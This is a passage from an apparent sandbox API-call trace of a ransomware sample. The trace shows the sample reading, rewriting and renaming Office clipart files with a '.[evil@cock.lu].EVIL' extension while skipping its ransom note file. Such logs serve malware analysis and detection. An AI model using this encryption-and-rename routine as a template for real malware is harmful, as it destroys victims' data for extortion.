(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.237] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b8, lpOverlapped=0x0) returned 1 [0124.276] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.276] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.276] _errno () returned 0x84b1160840 [0124.276] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.276] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0124.277] CloseHandle (hObject=0x1a8) returned 1 [0124.277] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.277] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.277] __uncaught_exception () returned 0x84b1160800 [0124.277] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.277] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf.[evil@cock.lu].evil")) returned 1 [0124.278] ??_V@YAXPEAX@Z () returned 0x1 [0124.281] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF", dwFileAttributes=0x200) returned 0 [0124.281] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.282] wcsstr (_Str="HH00235_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.282] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 69 [0124.282] wcscmp (_String1="HH00235_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.282] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00235_.WMF") returned 0x0 [0124.282] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 0x45 [0124.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.283] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x402, lpOverlapped=0x0) returned 1 [0124.299] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.299] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.299] _errno () returned 0x84b1160840 [0124.299] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.299] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x420, lpOverlapped=0x0) returned 1 [0124.299] CloseHandle (hObject=0x1a8) returned 1 [0124.299] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.299] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.299] __uncaught_exception () returned 0x84b1160800 [0124.299] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.299] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf.[evil@cock.lu].evil")) returned 1 [0124.300] ??_V@YAXPEAX@Z () returned 0x1 [0124.303] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF", dwFileAttributes=0x200) returned 0 [0124.303] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.303] wcsstr (_Str="HH00236_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.303] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 69 [0124.303] wcscmp (_String1="HH00236_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.303] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00236_.WMF") returned 0x0 [0124.303] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 0x45 [0124.303] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.305] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcd6, lpOverlapped=0x0) returned 1 [0124.734] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.734] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.734] _errno () returned 0x84b1160840 [0124.734] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.734] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xce0, lpOverlapped=0x0) returned 1 [0124.734] CloseHandle (hObject=0x1a8) returned 1 [0124.735] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.735] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.735] __uncaught_exception () returned 0x84b1160800 [0124.735] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.735] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf.[evil@cock.lu].evil")) returned 1 [0124.736] ??_V@YAXPEAX@Z () returned 0x1 [0124.739] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF", dwFileAttributes=0x200) returned 0 [0124.740] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.740] wcsstr (_Str="HH00241_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.740] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 69 [0124.740] wcscmp (_String1="HH00241_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.740] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00241_.WMF") returned 0x0 [0124.740] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 0x45 [0124.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.742] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7a8, lpOverlapped=0x0) returned 1 [0124.760] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.760] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.760] _errno () returned 0x84b1160840 [0124.760] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.760] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c0, lpOverlapped=0x0) returned 1 [0124.760] CloseHandle (hObject=0x1a8) returned 1 [0124.760] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.761] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.761] __uncaught_exception () returned 0x84b1160800 [0124.761] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.761] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf.[evil@cock.lu].evil")) returned 1 [0124.762] ??_V@YAXPEAX@Z () returned 0x1 [0124.765] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF", dwFileAttributes=0x200) returned 0 [0124.766] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.766] wcsstr (_Str="HH00260_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.766] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 69 [0124.766] wcscmp (_String1="HH00260_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.766] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00260_.WMF") returned 0x0 [0124.766] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 0x45 [0124.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.768] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe4e, lpOverlapped=0x0) returned 1 [0124.792] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.792] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.792] _errno () returned 0x84b1160840 [0124.792] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.792] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe60, lpOverlapped=0x0) returned 1 [0124.792] CloseHandle (hObject=0x1a8) returned 1 [0124.792] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.793] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.793] __uncaught_exception () returned 0x84b1160800 [0124.793] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.793] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf.[evil@cock.lu].evil")) returned 1 [0124.794] ??_V@YAXPEAX@Z () returned 0x1 [0124.798] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF", dwFileAttributes=0x200) returned 0 [0124.798] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.798] wcsstr (_Str="HH00276_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.798] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 69 [0124.798] wcscmp (_String1="HH00276_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.798] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00276_.WMF") returned 0x0 [0124.798] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 0x45 [0124.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.800] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbc8, lpOverlapped=0x0) returned 1 [0124.803] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.803] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.803] _errno () returned 0x84b1160840 [0124.803] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.803] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0124.803] CloseHandle (hObject=0x1a8) returned 1 [0124.803] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.804] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.804] __uncaught_exception () returned 0x84b1160800 [0124.804] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.804] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf.[evil@cock.lu].evil")) returned 1 [0124.805] ??_V@YAXPEAX@Z () returned 0x1 [0124.808] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF", dwFileAttributes=0x200) returned 0 [0124.808] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.808] wcsstr (_Str="HH00334_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.808] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 69 [0124.808] wcscmp (_String1="HH00334_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.808] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00334_.WMF") returned 0x0 [0124.808] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 0x45 [0124.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.813] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5f8, lpOverlapped=0x0) returned 1 [0124.825] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.825] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.825] _errno () returned 0x84b1160840 [0124.825] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.825] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x600, lpOverlapped=0x0) returned 1 [0124.825] CloseHandle (hObject=0x1a8) returned 1 [0124.825] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.825] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.825] __uncaught_exception () returned 0x84b1160800 [0124.826] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.826] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00334_.wmf.[evil@cock.lu].evil")) returned 1 [0124.826] ??_V@YAXPEAX@Z () returned 0x1 [0124.831] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00334_.WMF", dwFileAttributes=0x200) returned 0 [0124.831] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.831] wcsstr (_Str="HH00443_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.831] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 69 [0124.831] wcscmp (_String1="HH00443_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.831] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00443_.WMF") returned 0x0 [0124.831] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 0x45 [0124.831] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.834] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xce2, lpOverlapped=0x0) returned 1 [0124.891] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.891] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.891] _errno () returned 0x84b1160840 [0124.891] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.891] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd00, lpOverlapped=0x0) returned 1 [0124.891] CloseHandle (hObject=0x1a8) returned 1 [0124.891] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.891] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.891] __uncaught_exception () returned 0x84b1160800 [0124.891] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.891] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf.[evil@cock.lu].evil")) returned 1 [0124.892] ??_V@YAXPEAX@Z () returned 0x1 [0124.895] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF", dwFileAttributes=0x200) returned 0 [0124.895] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.895] wcsstr (_Str="HH00513_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.895] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 69 [0124.895] wcscmp (_String1="HH00513_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.895] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00513_.WMF") returned 0x0 [0124.895] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF") returned 0x45 [0124.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.897] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: 